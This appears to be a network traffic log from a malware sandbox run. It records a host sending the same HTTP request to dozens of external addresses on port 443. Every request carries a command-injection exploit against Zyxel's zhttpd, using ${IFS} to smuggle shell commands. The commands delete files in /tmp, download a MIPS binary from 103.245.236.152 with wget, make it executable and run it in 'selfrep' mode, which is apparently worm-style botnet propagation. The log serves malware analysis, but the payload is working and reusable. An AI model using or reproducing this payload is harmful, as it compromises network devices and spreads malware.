                                      Jan 14, 2024 15:50:06.768634081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      68192.168.2.1455146153.115.16.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.768686056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      69192.168.2.1448494152.49.47.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.768749952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      70192.168.2.143972062.250.101.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.768811941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      71192.168.2.1445178217.146.254.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.768843889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      72192.168.2.1434540107.225.148.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.769314051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      73192.168.2.1436098197.100.26.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.769357920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      74192.168.2.1441516222.193.1.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.769426107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      75192.168.2.143874679.107.59.143443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.769503117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      76192.168.2.1435420182.3.136.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.769556046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      77192.168.2.1456806199.175.18.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.769603968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      78192.168.2.1456774218.150.201.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.769680977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      79192.168.2.1435118121.142.235.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.769730091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      80192.168.2.14605224.49.52.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.769783020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      81192.168.2.1433012210.78.113.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.769840956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      82192.168.2.145583213.215.209.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.769872904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      83192.168.2.144062075.175.77.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.769951105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      84192.168.2.1449958135.240.150.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.770003080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      85192.168.2.145003074.187.40.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.770092010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      86192.168.2.1456402123.181.11.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.770102978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      87192.168.2.1438004213.27.104.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.770642996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      88192.168.2.1459182199.203.27.2443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.770687103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      89192.168.2.143645273.218.79.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.770726919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      90192.168.2.1457460129.138.194.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.770853996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      91192.168.2.1453730198.60.1.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.770876884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      92192.168.2.1446346211.181.22.162443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.770935059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      93192.168.2.145267689.248.44.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.770972967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      94192.168.2.1439784120.13.197.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.771024942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      95192.168.2.1446062141.18.157.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.771055937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      96192.168.2.1450052125.205.207.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.771130085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      97192.168.2.1452492110.74.27.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.771222115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      98192.168.2.1434506191.53.212.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.771256924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      99192.168.2.1432856177.90.201.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.771315098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      100192.168.2.1433598105.110.136.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.771378994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      101192.168.2.1458540118.142.198.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.771430969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      102192.168.2.144445469.105.190.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.771491051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      103192.168.2.1456058167.88.170.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.771644115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      104192.168.2.1438478157.55.96.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.771670103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      105192.168.2.1442988168.247.46.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.771740913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      106192.168.2.144016292.7.98.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.771776915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      107192.168.2.1434986119.26.120.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.771815062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      108192.168.2.1443804130.45.219.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.771857023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      109192.168.2.145205290.225.229.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.771913052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      110192.168.2.145110878.51.151.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.771972895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      111192.168.2.1450060100.37.173.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.772011995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      112192.168.2.1437068105.59.146.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.772083998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      113192.168.2.144164671.6.185.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.772123098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      114192.168.2.1456940208.107.151.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.772197008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      115192.168.2.1447520132.202.225.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.772245884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      116192.168.2.145961265.137.234.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.772314072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      117192.168.2.145763441.219.133.85443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.772340059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      118192.168.2.1451804220.247.157.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.772393942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      119192.168.2.145792449.187.120.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.772460938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      120192.168.2.1454590120.69.66.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.773618937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      121192.168.2.1441142185.172.227.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.773660898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      122192.168.2.144644834.64.136.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.773720980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      123192.168.2.145936852.129.82.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.773745060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      124192.168.2.144367487.69.52.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.773849010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      125192.168.2.144068470.24.228.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.773909092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      126192.168.2.145547838.137.119.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.773957014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      127192.168.2.144032486.192.138.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.774013996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      128192.168.2.1443860165.21.101.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.774065971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      129192.168.2.1459936150.164.141.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:06.774106026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      130192.168.2.1445604109.156.252.248443
                                      TimestampBytes transferredDirectionData
